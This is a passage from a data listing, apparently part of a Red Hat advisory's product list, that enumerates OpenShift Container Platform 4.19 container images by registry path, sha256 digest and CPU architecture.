"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
